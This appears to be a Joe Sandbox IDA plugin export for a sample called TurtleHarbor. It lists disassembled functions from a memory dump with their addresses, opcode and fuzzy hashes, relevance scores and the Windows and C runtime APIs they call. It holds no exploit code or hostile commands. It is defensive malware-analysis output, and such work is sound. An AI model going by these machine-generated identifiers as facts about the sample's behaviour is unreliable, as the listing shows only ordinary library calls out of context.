Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: ef4df838bbb85c3db64013916dc6406f00dcd7c211853f991baa62638f617bc6
Instruction ID: 7457a5a9859d82c7efb96d3c007dedf8a76fbc63aaa3e0edc024ebb3d8881320
Opcode Fuzzy Hash: ef4df838bbb85c3db64013916dc6406f00dcd7c211853f991baa62638f617bc6
Instruction Fuzzy Hash: 09018F71D01709EBCF13AF6A8C8299E7B61AF80360F198115F9285E1A1DB718A21DF91

Function 003355C6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00338D58: __getptd_noexit.LIBCMT ref: 00338D58

__lock_file.LIBCMT ref: 0033560B

Part of subcall function 00336E3E: __lock.LIBCMT ref: 00336E61

__fclose_nolock.LIBCMT ref: 00335616

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: a3c7f0f35367f72e7babcd2b2cadecc08e73a24bbcad4121a248ee0124a9c370
Instruction ID: 5ed063f234666fa905ea6be62500331a3cb897c3c52a1f20b54d178623d271c7
Opcode Fuzzy Hash: a3c7f0f35367f72e7babcd2b2cadecc08e73a24bbcad4121a248ee0124a9c370
Instruction Fuzzy Hash: 66F0B471802B05DAE7136F758882B6EB7A16F41330F218209F429EF1D1CBBC59019F51

Function 00335E80 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00335EB4
__ftell_nolock.LIBCMT ref: 00335EBF

Part of subcall function 00338D58: __getptd_noexit.LIBCMT ref: 00338D58

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: __ftell_nolock__getptd_noexit__lock_file
String ID:
API String ID: 2999321469-0
Opcode ID: 5c2f630dd6ae52af7a8e264ca9678ec42d3701d2a3cc2e271f1f0d31477051ce
Instruction ID: 72a70053fc1b25fe444775ca622d0346b73ce6ad2a32f079838df2ca91a747cd
Opcode Fuzzy Hash: 5c2f630dd6ae52af7a8e264ca9678ec42d3701d2a3cc2e271f1f0d31477051ce
Instruction Fuzzy Hash: 9EF0A032911719AADB03BB74898379EB2A06F41331F214206F024EF1D2CFB88E029B51

Function 00376FDA Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0), ref: 00376FFF
InterlockedExchange.KERNEL32(?,00000000), ref: 00377021

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: CountCriticalExchangeInitializeInterlockedSectionSpin
String ID:
API String ID: 4104817828-0
Opcode ID: 6b328e1e443db20172e39e1aef3f3ad145db10a776d30958b75fa2bc6d643fa3
Instruction ID: 31dea5b53f35f4f34d7e23333625d88a8b38704dd72859f03154e90e03486342
Opcode Fuzzy Hash: 6b328e1e443db20172e39e1aef3f3ad145db10a776d30958b75fa2bc6d643fa3
Instruction Fuzzy Hash: 1FF034B11007059FC3219F56D9489A7FBECEF85710B00882EE58A87A10C7B4A401CB61

Function 00325AC3 Relevance: 3.0, APIs: 2, Instructions: 25windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00325AEF
Shell_NotifyIconW.SHELL32(00000002,?), ref: 00325B1F

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: IconNotifyShell__memset
String ID:
API String ID: 928536360-0
Opcode ID: a05dc959a2aff6f781f34be55419ad1a9411be577bd22290d02cf29cb83c95b1
Instruction ID: ba8460726008828abc02ac7cb7c0ad62edcd6068766b441f8feaa97707c09639
Opcode Fuzzy Hash: a05dc959a2aff6f781f34be55419ad1a9411be577bd22290d02cf29cb83c95b1
Instruction Fuzzy Hash: 52F0A7708093589FD7938B24EC4579577BCA701308F0001EAAA4896292E7750B88CF91

Function 003332CF Relevance: 3.0, APIs: 2, Instructions: 7COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCorExitProcess.LIBCMT ref: 003332D5

Part of subcall function 0033329B: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,003332DA,00331003,?,00339EEE,000000FF,0000001E,003CCE28,00000008,00339E52,00331003,00331003), ref: 003332AA
Part of subcall function 0033329B: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 003332BC

ExitProcess.KERNEL32 ref: 003332DE

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: a6ee57bfb5cd7b9112fe2aa8d4b72317fa4d5040cc5bff891fbae9d0c0d83ffc
Instruction ID: 8b8870339636709a4e447faf015de7863d0a253e99cbaea4e522bf82a7527aa6
Opcode Fuzzy Hash: a6ee57bfb5cd7b9112fe2aa8d4b72317fa4d5040cc5bff891fbae9d0c0d83ffc
Instruction Fuzzy Hash: 14B09230000208BBCF462F11DC0A84E3F29FB01B90F008020F80448071DBB2AAA29A80

Function 0038C355 Relevance: 1.8, APIs: 1, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: LoadString$__swprintf
String ID:
API String ID: 207118244-0
Opcode ID: 46b528752acedf23ea3c6df22f08cbbb8dd19831ac6084bc8a1ccd6c2e015437
Instruction ID: 3d5ad4e1e9a7dfdd1359f6d1a66ce873a1d803d06da798f6b6f5464b7bc4fc68
Opcode Fuzzy Hash: 46b528752acedf23ea3c6df22f08cbbb8dd19831ac6084bc8a1ccd6c2e015437
Instruction Fuzzy Hash: 01B17F34A00209DFCF16EFA4D891DEEB7B5FF48710F14915AF915AB291EB70A942CB60

Function 0031A820 Relevance: 1.7, APIs: 1, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 004949215bac14d3df8e74363db60aae652813413605ee7baabf0253e89e02f6
Instruction ID: 198358221c5a21b5d168ad036137bee41a942f0ad35c8a5b049b9fce667b3125
Opcode Fuzzy Hash: 004949215bac14d3df8e74363db60aae652813413605ee7baabf0253e89e02f6
Instruction Fuzzy Hash: B161BD70601A0A9FCB1ADF50C881EBAB7F9EF49311F128069E8168B691D774EDC4CB51

Function 0032343F Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0032351A

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: d0610ac13a79df7fd6fcea0f9a88704d7ba0b831ea08fdd2daeb19c394a1f8b3
Instruction ID: b005e7194b32e8b97ee9cb0b8840cec5f450ccf20230a57842aec3374ec55e1f
Opcode Fuzzy Hash: d0610ac13a79df7fd6fcea0f9a88704d7ba0b831ea08fdd2daeb19c394a1f8b3
Instruction Fuzzy Hash: D231E675204622DFC72AEF19E490A21F7E4FF09310B15C5AEE88A8B751DB34DC81CB80

Function 0034E2DF Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0034E2EA

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 5d71d2f9cd774a245e791b5d69453ce42504f3ab7b92c8dd455d029b128cdfbc
Instruction ID: 044b841eaf72fadd21e65c112330e4be8ec1f3efee8096cc8ae2433e0b0e169f
Opcode Fuzzy Hash: 5d71d2f9cd774a245e791b5d69453ce42504f3ab7b92c8dd455d029b128cdfbc
Instruction Fuzzy Hash: BE410974508351DFDB1ADF54C495B5ABBE1BF49308F0A88ACE8894B362C371EC85CB52

Function 003249C2 Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00324B29: FreeLibrary.KERNEL32(00000000,?), ref: 00324B63

Part of subcall function 0033547B: __wfsopen.LIBCMT ref: 00335486

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,003227AF,?,00000001), ref: 003249F4

Part of subcall function 00324ADE: FreeLibrary.KERNEL32(00000000), ref: 00324B18

Part of subcall function 003248B0: _memmove.LIBCMT ref: 003248FA

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 3e1d09a03fc7fcbce6d1c793d0bc2ae43e7e378a1d4c1d8808eed566f314d8fe
Instruction ID: f6372d00ab21ee3e70263c38266c9a14346a782a9390582ee1e5721577bf1270
Opcode Fuzzy Hash: 3e1d09a03fc7fcbce6d1c793d0bc2ae43e7e378a1d4c1d8808eed566f314d8fe
Instruction Fuzzy Hash: 4011E332650225ABCB16FB70EC06FAE77A99F40701F10842DF582AE191EB759A10AB94

Function 0034E3C2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 0034E3CE

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 40f9959812dfa2e9c7a4e16d8c969d5cdbefb95d84b5b60553fff6d4776492b3
Instruction ID: c0df0cf51003d5b495aed0842af54bbc71bdf114142916d768e70f72b8937b3a
Opcode Fuzzy Hash: 40f9959812dfa2e9c7a4e16d8c969d5cdbefb95d84b5b60553fff6d4776492b3
Instruction Fuzzy Hash: 0821E4B4508341DFDB1ADF54C445A5ABBE5BF89304F05896CF88A5B722C731E889CB52

Function 00321A36 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00321A77

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 76d5dfd19126f7aba3bb295fb5ed34499109e4abbdc830f683e47744b2f34f36
Instruction ID: a3721a4a5989fe950646d9c11e4ce32b0bfd00c70998fec89f48b7c7f6165694
Opcode Fuzzy Hash: 76d5dfd19126f7aba3bb295fb5ed34499109e4abbdc830f683e47744b2f34f36
Instruction Fuzzy Hash: 7401F9722017116ED3265F38DD02F77BBA8DB447A0F10852EF51ACE1D1EA31E4408790

Function 0036FEF8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0036FF33

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 524012750e4e2dcf7e61148e9ab6183d9ead0e35b9a22c255aa3d145d03428bc
Instruction ID: 5b5930ef0986e6d5aaa50c23b4544e445625a26486fb08ea041d4d450e6fd47c
Opcode Fuzzy Hash: 524012750e4e2dcf7e61148e9ab6183d9ead0e35b9a22c255aa3d145d03428bc
Instruction Fuzzy Hash: 200186722002156BCB19DF2DD89196BB7A9EF86354714857EF90ACF245E631E901C790

Function 0038495B Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00384998

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: EnvironmentVariable
String ID:
API String ID: 1431749950-0
Opcode ID: 16543c6b5064f728f759643e01c2de60fd4fa9011dbc41720731268c86e0c1b5
Instruction ID: 257a0195e418e3abab55118640a99cf60aed1cf3a8f53712dc9ed1e8884c8e0f
Opcode Fuzzy Hash: 16543c6b5064f728f759643e01c2de60fd4fa9011dbc41720731268c86e0c1b5
Instruction Fuzzy Hash: 8BF03175608205AF9B16FB65D846C9F7BBCEF49320B004455F9099B261EE70AD41C750

Function 00324A8C Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

_fseek.LIBCMT ref: 00324AA4

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: _fseek
String ID:
API String ID: 2937370855-0
Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
Instruction ID: b4ae826f78b3b57ad5ccd1d6eb520fb9dfa0d94faa60aea70eaab1c0e9322753
Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
Instruction Fuzzy Hash: 4DF08CB6400208BFDF168F54DC00CEB7B7DEB85320F004198F9045A110D232EA219BA0

Function 00324A2F Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,003227AF,?,00000001), ref: 00324A63

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 8bce5a8e841fd58dc9b23ad43146e2f3043fcc7ed11cfc1b0f57fa92f9c07f2b
Instruction ID: 66fa017d926ae4483ea64e886b6576f33940177c779fc49cc45deb805dcd42da
Opcode Fuzzy Hash: 8bce5a8e841fd58dc9b23ad43146e2f3043fcc7ed11cfc1b0f57fa92f9c07f2b
Instruction Fuzzy Hash: C1F01571145721CFCB369F64F490816BBF4AF14325321892EE1D783A10C731A984DF44

Function 00324AB2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00324AD0

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
Instruction ID: 372fb4e686daeb9c4efd0a946c47af647da05102a4769677a2b645c2d939a9c4
Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
Instruction Fuzzy Hash: B2F0F87250020DFFDF05CF90C941EAABB79FB14314F208589F9198B212D336DA21ABA1

Function 003309C5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003309E4

Part of subcall function 00321821: _memmove.LIBCMT ref: 0032185B

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 2151097895adb00e874beec02f6a4db2994384cef1b4d7ffa6b9892aba4fffba
Instruction ID: 71e99cb53c71d02016a41a5e07f09895a145fa537d81a67bad6396c876f1328a
Opcode Fuzzy Hash: 2151097895adb00e874beec02f6a4db2994384cef1b4d7ffa6b9892aba4fffba
Instruction Fuzzy Hash: 16E0863690012857C72296989C05FEAB7DDDB89790F0401B6FC08DB344D960AC818691

Function 003777C2 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,Function_000677A8,?,00000000,?), ref: 003777DD

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 491aacd54a9c30c2d99e6915ab50a6507555767332d440fa422950a586bf8874
Instruction ID: f95d31b8bd05a2672162fa0ce9a29110f453bc997ca2bb4cb49c3aafe86345b7
Opcode Fuzzy Hash: 491aacd54a9c30c2d99e6915ab50a6507555767332d440fa422950a586bf8874
Instruction Fuzzy Hash: 81D017B1438318BFAA2D8B64DC4ACB7779CEA06222740436EF80982600E7A5BC0086A0

Function 00374D18 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00374D31

Part of subcall function 00321821: _memmove.LIBCMT ref: 0032185B

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: FolderPath_memmove
String ID:
API String ID: 3334745507-0
Opcode ID: 9414b72ab1f729aa83c5e22003f1812677b4f614ee73623703a0473235c35565
